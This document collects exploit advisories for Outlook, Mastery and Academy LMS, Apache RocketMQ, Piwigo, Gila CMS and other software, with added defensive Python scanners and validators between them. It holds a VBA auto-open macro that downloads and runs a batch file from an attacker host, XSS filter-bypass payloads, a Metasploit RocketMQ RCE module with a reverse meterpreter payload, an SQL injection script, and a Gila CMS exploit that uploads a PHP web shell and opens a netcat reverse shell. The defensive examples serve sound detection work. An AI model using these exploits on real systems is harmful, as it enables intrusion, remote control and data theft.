<pre><code>## Title: Microsoft Outlook ®Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit RCE
## Author: nu11secur1ty
## Date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131


## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to
send an infected Word file with malicious content
to everyone who uses the Outlook app, whether web or local.
Microsoft still doesn't have a patch against this 0-day vulnerability today.

## Status: HIGH Vulnerability

[+]Exploit:

- The malicious Word file:

```vb
Sub AutoOpen()
    ' Runs when the document opens: shells out to cmd.exe, fetches a batch file with curl and executes it
    Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)

## Time spent:
00:30:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html https://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
 nu11secur1ty <http://nu11secur1ty.com/>
</code></pre>
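The macro above is an auto-executing download-and-run stub; a defender-side heuristic for exactly that pattern follows, as an added example that is not part of the advisory. It scans VBA source already extracted from a document (for example with oletools' olevba), and the sample macro, including its placeholder host, is constructed.

```python
"""Heuristic scan of extracted VBA source for auto-executing download-and-run macros.
Added example (not the advisory author's code); the sample macro below is constructed."""
import re

# Procedures Office runs automatically when a document or workbook is opened.
AUTO_EXEC = re.compile(r"^\s*(Private\s+|Public\s+)?Sub\s+(AutoOpen|Document_Open|Auto_Open|Workbook_Open)\b", re.I | re.M)
# Ways to spawn a process from VBA.
SPAWN = re.compile(r'\b(Shell|WScript\.Shell|CreateObject\s*\(\s*"WScript\.Shell"\s*\))', re.I)
# Downloaders and interpreters typically chained from such a macro (curl and cmd.exe in the advisory).
LOLBIN = re.compile(r"\b(curl|certutil|bitsadmin|powershell|cmd\.exe)\b", re.I)
URL = re.compile(r"https?://[^\s\"']+", re.I)

def scan_vba(source: str) -> dict:
    """Return the indicators found in one VBA module plus an overall verdict."""
    findings = {
        "auto_exec": [m.group(2) for m in AUTO_EXEC.finditer(source)],
        "spawn": sorted({m.group(1) for m in SPAWN.finditer(source)}),
        "lolbin": sorted({m.group(1).lower() for m in LOLBIN.finditer(source)}),
        "urls": URL.findall(source),
    }
    # Auto-execution plus a process spawn is suspicious on its own; a remote URL or a
    # known downloader on top is the download-and-run pattern shown in the advisory.
    score = bool(findings["auto_exec"]) + bool(findings["spawn"]) + bool(findings["urls"] or findings["lolbin"])
    findings["verdict"] = {0: "clean", 1: "low", 2: "suspicious", 3: "malicious"}[score]
    return findings

# Constructed sample mirroring the advisory's macro (attacker.example is a placeholder host).
SAMPLE_MACRO = r'''Sub AutoOpen()
 Call Shell("cmd.exe /S /c" & "curl -s https://attacker.example/payload.bat > payload.bat && .\payload.bat", vbNormalFocus)
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = '''Sub FormatHeader()
 Selection.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, scan_vba(src))
```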
<pre><code># Exploit Title: Mastery LMS 1.2 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 09/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/mastery/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Description

Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.



Path: /browse

GET parameter 'search' is vulnerable to XSS

https://website/browse?search=[XSS]

GET parameter 'featured' is vulnerable to XSS

https://website/browse?featured=[XSS]

GET parameter 'recommended' is vulnerable to XSS

https://website/browse?recommended=[XSS]

GET parameter 'skill' is vulnerable to XSS

https://website/browse?skill=[XSS]


Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script>
XSS Filter Bypass : "><script>alert(1)</script>


[-] Done
</code></pre>
<pre><code># Exploit Title: Academy LMS 5.15 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 09/07/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site



## Description

Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive
information, manipulate data, and launch additional attacks.



Path: /home/courses

GET parameter 'sort_by' is vulnerable to XSS

https://website/home/courses?category=photoshop&price=all&level=all&language=all&rating=all&sort_by=[XSS]

Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script>
XSS Filter Bypass : ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd


[-] Done
</code></pre>
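Both the Mastery LMS and Academy LMS entries above report the same thing: a plain script tag is blocked by the WAF, while a payload that first closes the attribute it is reflected into is not. The added example below (not the vendor's code) makes that visible by rendering each reported payload through an unencoded and an entity-encoded template and counting the script tags a browser tokenizer would actually see. The WAF rule is a constructed stand-in that only blocks a value beginning with a script tag, which is what the blocked/bypass pair implies.

```python
"""Reported WAF verdict versus what reaches the browser, for the advisories' payloads.
Added example (not the vendor's code); the WAF rule below is constructed."""
import html
import re
from html.parser import HTMLParser

# Constructed WAF rule: blocks only a value that starts with a <script> tag.
BLOCKLIST = re.compile(r"^\s*<script>", re.I)

PAYLOADS = {
    "plain": "<script>alert(1)</script>",                       # reported as blocked by the WAF
    "mastery_bypass": '"><script>alert(1)</script>',            # Mastery LMS bypass
    "academy_bypass": 'ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd',  # Academy LMS bypass
}

def waf_blocks(value: str) -> bool:
    return BLOCKLIST.search(value) is not None

def render_unsafe(search: str) -> str:
    """Reflect the parameter into an attribute value without encoding (the vulnerable pattern)."""
    return f'<input type="text" name="search" value="{search}">'

def render_safe(search: str) -> str:
    """Same template; the value is entity-encoded for the attribute context (quote=True encodes the quote)."""
    return f'<input type="text" name="search" value="{html.escape(search, quote=True)}">'

class ScriptCounter(HTMLParser):
    """Counts <script> start tags as a browser's tokenizer would see them (tag names are lowercased)."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1

def script_tags(rendered: str) -> int:
    parser = ScriptCounter()
    parser.feed(rendered)
    parser.close()
    return parser.scripts

def evaluate(payload: str) -> dict:
    """Compare the WAF verdict with the number of script tags each rendering yields."""
    return {
        "waf_blocks": waf_blocks(payload),
        "unsafe_script_tags": script_tags(render_unsafe(payload)),
        "safe_script_tags": script_tags(render_safe(payload)),
    }

if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(name, evaluate(payload))
```

Note that the plain payload the WAF blocks would not even become a tag inside a quoted attribute, while the two bypasses that the WAF lets through do; only the encoded template neutralises all three.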
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Auxiliary::Rocketmq
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache RocketMQ update config RCE',
        'Description' => %q{
          RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is
          leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using
          the update configuration function to execute commands as the system users that RocketMQ is running as.
          Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.
        },
        'Author' => [
          'Malayke', # PoC
          'jheysel-r7', # module - RCE portion
          'h00die', # module - Version detection & parsing
        ],
        'References' => [
          [ 'URL', 'https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT#usage-examples'],
          [ 'CVE', '2023-33246']
        ],
        'License' => MSF_LICENSE,
        'Platform' => %w[unix linux],
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Automatic (Unix In-Memory)',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
              'Type' => :nix_memory
            }
          ],
        ],
        'Payload' => {
          'BadChars' => "\x27"
        },
        'DefaultOptions' => {
          'WfsDelay' => 60
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-23',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The RocketMQ NameServer port', 9876]),
        OptPort.new('BROKER_PORT', [false, 'The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the NameServer response (recommended)', 10911])
      ]
    )
  end

  def check
    @version_request_response = send_version_request
    @parsed_data = parse_rocketmq_data(@version_request_response)
    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless @parsed_data['version']

    version = Rex::Version.new(@parsed_data['version'].gsub('V', ''))
    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version

    if version > Rex::Version.new('5.0.0')
      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
    elsif version <= Rex::Version.new('4.9.5')
      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
    end
    Exploit::CheckCode::Safe("RocketMQ version: #{version}")
  end

  def execute_command(cmd, opts = {})
    # RocketMQ frame: 4-byte total length, then a 4-byte field holding the serializer type
    # (0 = JSON) and the 24-bit header length, then the JSON header, then the raw body.
    # The JSON header below is exactly 96 bytes, so the leading backtick (0x60) is the low
    # byte of that length field; the three zero bytes added to the length prefix complete it.
    # The body is key=value lines: filterServerNums=1 plus the injected rocketmqHome value.
    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
    header = [data.length + 3].pack('N') + "\x00\x00\x00"
    payload = header + data

    begin
      vprint_status("Payload command to be executed: #{cmd}")
      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => opts[:broker_port].to_i })
      vprint_status("Payload is #{data}")
      sock.put(payload)
    rescue Rex::ConnectionError, ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e
      fail_with(Failure::Unreachable, "Unable to connect: #{e.class} #{e.message}")
    end
  end

  def on_new_session(session)
    print_status('Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted')

    if session.type == 'meterpreter'
      pwd = session.fs.dir.pwd
    else
      pwd = session.shell_command_token('pwd')
    end

    # The session returned by the exploit spawns inside $ROCKETMQ_HOME/bin
    pwd.gsub!('/bin', '')
    print_good("Determined the original $ROCKETMQ_HOME: #{pwd}")
    print_status('Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value')

    execute_command(pwd, { broker_port: @broker_port })
  end

  def exploit
    @version_request_response ||= send_version_request
    @parsed_data ||= parse_rocketmq_data(@version_request_response)
    @broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])
    print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")
    execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })
  end
end
</code></pre>
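The module above hand-builds a RocketMQ remoting frame whose body rewrites rocketmqHome, which the broker's FilterServerManager then uses as part of a shell command. The added example below (not Rapid7's or Apache's code) decodes that frame layout from the wire and flags an UPDATE_BROKER_CONFIG request whose rocketmqHome value could not be a path; both sample frames are constructed here and the injected command is a harmless placeholder.

```python
"""Decode RocketMQ remoting frames and flag the config update abused in CVE-2023-33246.
Added example (not Rapid7's or Apache's code); the frames built below are constructed."""
import json
import re
import struct

UPDATE_BROKER_CONFIG = 25  # request code sent by the module
SERIALIZE_JSON = 0         # serializer type byte; 0 means the header is JSON

def build_frame(header: dict, body: bytes) -> bytes:
    """Encode one frame: [total len][type byte | 24-bit header len][JSON header][body]."""
    hdr = json.dumps(header, separators=(",", ":")).encode()
    total = 4 + len(hdr) + len(body)  # counts the type/len field, not the total-length field itself
    return struct.pack(">II", total, (SERIALIZE_JSON << 24) | len(hdr)) + hdr + body

def parse_frame(frame: bytes) -> tuple[dict, bytes]:
    """Split a frame into its JSON header and raw body, validating both length fields."""
    if len(frame) < 8:
        raise ValueError("truncated frame")
    total, typelen = struct.unpack(">II", frame[:8])
    if total != len(frame) - 4:
        raise ValueError("length prefix does not match frame size")
    if typelen >> 24 != SERIALIZE_JSON:
        raise ValueError("unsupported header serializer")
    hdr_len = typelen & 0xFFFFFF
    if 8 + hdr_len > len(frame):
        raise ValueError("header length exceeds frame")
    return json.loads(frame[8:8 + hdr_len]), frame[8 + hdr_len:]

SHELL_META = re.compile(r"[;|&$`\s]")

def suspicious_config_update(frame: bytes) -> list[str]:
    """Reasons a frame looks like the rocketmqHome injection; empty list if it looks legitimate."""
    header, body = parse_frame(frame)
    if header.get("code") != UPDATE_BROKER_CONFIG:
        return []
    # The body is key=value lines; the module terminates the injected value with ";\n".
    props = dict(line.split("=", 1) for line in body.decode(errors="replace").splitlines() if "=" in line)
    home = props.get("rocketmqHome", "").strip().rstrip(";")
    reasons = []
    if home and SHELL_META.search(home):
        reasons.append("rocketmqHome contains shell metacharacters")
    if home and not home.startswith("/"):
        reasons.append("rocketmqHome is not an absolute path")
    # FilterServerManager only spawns the script under rocketmqHome when filterServerNums > 0.
    if home and props.get("filterServerNums", "0").strip() != "0":
        reasons.append("filterServerNums raised in the same update that rewrites rocketmqHome")
    return reasons

HEADER = {"code": UPDATE_BROKER_CONFIG, "flag": 0, "language": "JAVA", "opaque": 0,
          "serializeTypeCurrentRPC": "JSON", "version": 395}
# Constructed frames: the module's injection pattern with a placeholder command, and a benign update.
MALICIOUS = build_frame(HEADER, b"filterServerNums=1\nrocketmqHome=-c $@|sh . echo placeholder;\n")
BENIGN = build_frame(HEADER, b"rocketmqHome=/opt/rocketmq;\n")
```

Because HEADER serialises to exactly 96 bytes, build_frame emits the same four bytes (three zeros and 0x60, the backtick) that the module writes by hand; calling suspicious_config_update(MALICIOUS) returns all three reasons while BENIGN returns none.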
<pre><code>#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
#Date: 25 June 2023
#Exploit Author: Okan Kurtulus
#Vendor Homepage: https://piwigo.org
#Version: 13.7.0
#Tested on: Ubuntu 22.04
#CVE : N/A

# Proof of Concept:
1– Install the system through the website and log in with any user authorized to upload photos.
2– Click "Add" under "Photos" from the left menu. Select the photo you want to upload and upload it.
3– Click on the uploaded photo and the photo editing screen opens. Enter the XSS payload in the "Description" field on this screen. After saving, go to the homepage and open the page with the photo. The XSS payload is triggered.

#Payload
<sCriPt>alert(1);</sCriPt>

</code></pre>
<pre><code># Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")

</code></pre>
<pre><code># Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05-07-2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/
# Version: Gila 1.10.9
# Tested on: Linux

import requests
from termcolor import colored
from urllib.parse import urlparse

# Print ASCII art
ascii_art = """
 ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ 
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ 
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗
 ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝

 by Unknown_Exploit
"""

print(colored(ascii_art, "green"))

# Prompt user for target URL
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")

# Extract domain from target URL
parsed_url = urlparse(target_url)
domain = parsed_url.netloc
target_url_2 = f"http://{domain}/"

# Prompt user for login credentials
username = input("Enter the email: ")
password = input("Enter the password: ")

# Create a session and perform login
session = requests.Session()
login_payload = {
    'action': 'login',
    'username': username,
    'password': password
}
response = session.post(target_url, data=login_payload)
cookie = response.cookies.get_dict()
# Both cookies are needed for the authenticated file-manager request below
if 'PHPSESSID' not in cookie or 'GSESSIONID' not in cookie:
    raise SystemExit("Login failed: session cookies were not issued.")
var1 = cookie['PHPSESSID']
var2 = cookie['GSESSIONID']

# Prompt user for local IP and port
lhost = input("Enter the local IP (LHOST): ")
lport = input("Enter the local port (LPORT): ")

# Construct the payload
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"

# Perform file upload using POST request
# (Content-Length is computed by requests from the body; a hard-coded value would not match)
upload_url = f"{target_url_2}fm/upload"
upload_headers = {
    "Host": domain,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",
    "Accept": "*/*",
    "Origin": target_url_2,
    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9",
    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",
    "Connection": "close"
}
upload_data = '''
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"
Content-Type: application/x-php

<?php system($_GET["cmd"]);?>

------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="path"

tmp
------WebKitFormBoundarynKy5BIIJQcZC80i2
Content-Disposition: form-data; name="g_response"

content
------WebKitFormBoundarynKy5BIIJQcZC80i2--
'''

upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)

if upload_response.status_code == 200:
    print("File uploaded successfully.")
    # Execute payload
    response = session.get(payload_url)
    print("Payload executed successfully.")
else:
    print("Error uploading the file:", upload_response.text)

</code></pre>
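The upload above succeeds because the file manager accepts a .php7 name and an arbitrary target directory. The added example below (not Gila's code) is the server-side check that would reject it: it allowlists extensions across every dot in the name, refuses dotfiles such as .htaccess, pins the destination under an assumed upload root, and refuses bodies that start like a PHP script. The root path and sample uploads are constructed.

```python
"""Server-side upload check that rejects the shell.php7 upload shown in the exploit.
Added example (not Gila's code); UPLOAD_ROOT and the sample uploads are constructed."""
import posixpath
from typing import Optional, Tuple

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Extensions that common server configs hand to the PHP interpreter. The exploit uses
# .php7 precisely because a denylist that only knows ".php" lets it through.
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "phps"}
UPLOAD_ROOT = "/var/www/html/tmp"  # assumed upload directory (constructed)

def safe_name(filename: str) -> Optional[str]:
    """Return a sanitized basename, or None if any part of the name is unacceptable."""
    base = posixpath.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return None  # dotfiles such as .htaccess can remap handlers for the directory
    parts = base.lower().split(".")
    if len(parts) < 2:
        return None
    # Check every extension, not just the last: x.php7.jpg still runs under some handlers.
    if set(parts[1:]) & PHP_EXTS or parts[-1] not in ALLOWED_EXT:
        return None
    return base

def check_upload(filename: str, content: bytes, path: str) -> Tuple[bool, str]:
    """Allowlist the name, pin the destination under UPLOAD_ROOT, refuse script-looking bodies."""
    base = safe_name(filename)
    if base is None:
        return False, "rejected filename"
    # Normalise the client-supplied path component and make sure it stays under the root.
    dest = posixpath.normpath(posixpath.join(UPLOAD_ROOT, path, base))
    if not dest.startswith(UPLOAD_ROOT + "/"):
        return False, "path escapes upload root"
    if content.lstrip().startswith(b"<?"):
        return False, "content looks like a PHP script"
    return True, dest

if __name__ == "__main__":
    # Constructed samples: the exploit's upload, and an ordinary image.
    print(check_upload("shell.php7", b'<?php echo "constructed"; ?>', "tmp"))
    print(check_upload("photo.jpg", b"\x89PNG\r\n\x1a\n", ""))
```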
<pre><code>====================================================================================================================================
| # Title : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403 |
| # Dork : |
====================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] all users and passwords saved as clear text

[+] use payload : /storage/info.txt

[+] login : /login.php

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : DaillyTools v1 command execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |
| # Vendor : http://github.com/islamoc/DaillyTools |
| # Dork : Coded by Mennouchi Islam Azeddine |
====================================================================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] infected file : PHP_Comments.php

[+] Line : 20

 Function Name : exec
 Variables : $arr

[+] PHP_Comments.php?arr= pwd 

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : CakePHP Test Suite v2.7.0 Xss Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |
| # Vendor : https://cakephp.org/ |
| # Dork : n/a |
====================================================================================================================================


poc :

[+] Dorking in Google or another search engine

[+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>

[+] create a new user and post a comment, or use the payload in the search box

[+] http://127.0.0.1/forum.groupethika.com/


Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================
</code></pre>